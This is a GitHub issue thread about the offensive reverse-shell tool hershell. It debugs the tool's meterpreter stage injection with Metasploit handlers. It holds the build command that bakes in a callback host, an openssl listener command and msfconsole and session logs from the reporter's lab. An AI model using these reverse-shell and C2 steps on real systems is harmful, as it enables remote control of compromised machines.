Comments (7)
Hi @b1tg ,
Thanks for the report, I'll look into it this week.
Please note that this feature is a bit buggy currently, and I am working on a way to improve it.
from hershell.
Ok so I see what's going on here, and you might have misunderstood something along the way.
You need two payload handlers:
- one for hershell to connect back
- one for your meterpreter payload to connect back
The one I gave as an example in the README is the one needed for hershell.
You need to start another one for your meterpreter session. Currently, I'm only supporting the following payloads for the meterpreter staging:
- windows/meterpreter/reverse_tcp: the X86 reverse TCP meterpreter for Windows
- windows/x64/meterpreter/reverse_tcp: the X86_64 TCP meterpreter for Windows
I've implemented the reverse_http and reverse_https, but it needs more testing before being pushed on master.
So, to sum it up, what you need is:
- Start a listener for hershell (ncat, openssl, msfconsole, etc.)
- Get your hershell session
- Start a payload handler (using exploit/multi/handler) for the following payload: windows/x64/meterpreter/reverse_tcp
- Run meterpreter KALI_IP:PORT in hershell
- Hopefully, enjoy your new injected meterpreter
The current README might be confusing, so I think I will add some examples, and clean it a bit so there will be no more confusion in the future.
Let me know if it still does not work after trying this.
And anyway, thanks for your interest in this project.
from hershell.
I tried this again and it still doesn't work: hershell exited after running "meterpreter ip:port", and the meterpreter session wasn't created.
msf exploit(handler) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
2 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://192.168.123.47:1235
msf exploit(handler) >
[*] Sending stage (205379 bytes) to 192.168.123.47
[*] - Meterpreter session 4 closed. Reason: Died
[*] Meterpreter session 4 opened (127.0.0.1 -> 127.0.0.1) at 2018-01-22 13:33:04 +0800
msf exploit(handler) > sessions
Active sessions
===============
No active sessions.
msf exploit(handler) >
ss@kali:~/Desktop/tools/hershell$ make windows64 LHOST=192.168.123.47 LPORT=1234
GOOS=windows GOARCH=amd64 go build --ldflags "-X main.connectString=192.168.123.47:1234 -X main.fingerPrint=$(openssl x509 -fingerprint -sha256 -noout -in server.pem | cut -d '=' -f2) -H=windowsgui" -o hershell.exe hershell.go
ss@kali:~/Desktop/tools/hershell$ ls
hershell.exe hershell.go Makefile README.md server.key server.pem shell
ss@kali:~/Desktop/tools/hershell$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsxNQxfJJJdMvrhFAhJTvJLwpKgmKPoJCgX+fdym91b4E
MKdz81UgLJ0ThllSWD3rG/hJfPsXCB1etszAKPpzjPnXUFYhJTc97PiFOGk5vJjj
KaEGAgRaZXc7ogQCAhwgpAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: X25519:P-256:P-384:P-521
Shared Elliptic curves: X25519:P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
[hershell]> meterpreter 192.168.123.47:1235
[hershell]> ERROR
shutting down SSL
CONNECTION CLOSED
ACCEPT
from hershell.
Thanks for the update, I'll look into it.
As I said earlier, this feature is still a bit buggy, and needs improvements.
I'll leave this issue open until the meterpreter injection works reliably.
I had some similar issues with Windows Server 2008 R2 recently: I had to retry several times to get the reverse TCP payload to work, whereas it worked like a charm on a Windows 10 machine.
Anyway, I'll look into it.
from hershell.
The issue should be fixed in 3ceef30, pushed in master.
There was indeed a problem while fetching the stage2 from the metasploit TCP handler.
Could you please get the latest version and test again?
I have no problem on Windows 10 x64 with this update.
from hershell.
I just tested again, and the problem is fixed in the latest version.
Nicely done! @lesnuages
from hershell.
Great, let's close this one :)
from hershell.